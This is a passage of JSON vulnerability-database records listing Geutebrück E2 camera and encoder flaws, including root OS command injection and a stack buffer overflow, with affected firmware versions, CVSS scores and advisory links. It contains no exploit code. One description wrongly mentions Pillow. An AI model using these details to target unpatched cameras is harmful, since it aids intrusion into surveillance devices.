"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"date": "2021-09-13T18:15:22.290000",
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"date": "2023-11-07T03:35:51.630000",
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
VAR-201812-0470
Vulnerability from variot - Updated: 2025-01-30 19:51In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25 the DDNS configuration (in the Network Configuration panel) is vulnerable to an OS system command injection as root. The Geutebr\303\274ck E2CameraSeries is an E2 series webcam from Geutebr\303\274ck, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebrück GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-0470",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam\\/efd-2251",
"scope": "lt",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam\\/ewpc-2275",
"scope": "lt",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2251",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ewpc-2275",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "e2 camera series",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "e2 series camera",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebr\u00fcck",
"version": "1.12"
},
{
"model": "e2 series camera",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebr\u00fcck",
"version": "1.12.0.25"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "BID",
"id": "106208"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2251_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fewpc-2275_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "106208"
}
],
"trust": 0.3
},
"cve": "CVE-2018-19007",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-19007",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.4,
"id": "CNVD-2019-04134",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-19007",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-19007",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-19007",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2019-04134",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-657",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-19007",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25 the DDNS configuration (in the Network Configuration panel) is vulnerable to an OS system command injection as root. The Geutebr\\303\\274ck E2CameraSeries is an E2 series webcam from Geutebr\\303\\274ck, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebr\u00c3\u00bcck GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-19007"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "BID",
"id": "106208"
},
{
"db": "VULMON",
"id": "CVE-2018-19007"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-19007",
"trust": 3.5
},
{
"db": "ICS CERT",
"id": "ICSA-18-347-03",
"trust": 2.8
},
{
"db": "BID",
"id": "106208",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-04134",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-19007",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"db": "BID",
"id": "106208"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"id": "VAR-201812-0470",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
}
]
},
"last_update_date": "2025-01-30T19:51:02.593000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.guardzilla.com/"
},
{
"title": "Geutebr\\303\\274ckE2CameraSeries operating system command injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/153491"
},
{
"title": "Geutebr\u00fcck E2 Camera Series Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=87899"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-347-03"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/106208"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19007"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19007"
},
{
"trust": 0.3,
"url": "https://www.geutebrueck.com/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"db": "BID",
"id": "106208"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"db": "BID",
"id": "106208"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"date": "2018-12-14T00:00:00",
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"date": "2018-12-14T00:00:00",
"db": "BID",
"id": "106208"
},
{
"date": "2019-03-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"date": "2018-12-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"date": "2018-12-14T20:29:00.297000",
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-04134"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2018-19007"
},
{
"date": "2018-12-14T00:00:00",
"db": "BID",
"id": "106208"
},
{
"date": "2019-03-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014624"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-657"
},
{
"date": "2024-11-21T03:57:09.213000",
"db": "NVD",
"id": "CVE-2018-19007"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebrueck GmbH E2 Camera In the series OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014624"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-657"
}
],
"trust": 0.6
}
}
VAR-202109-0598
Vulnerability from variot - Updated: 2025-01-30 19:32Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0598",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33545",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
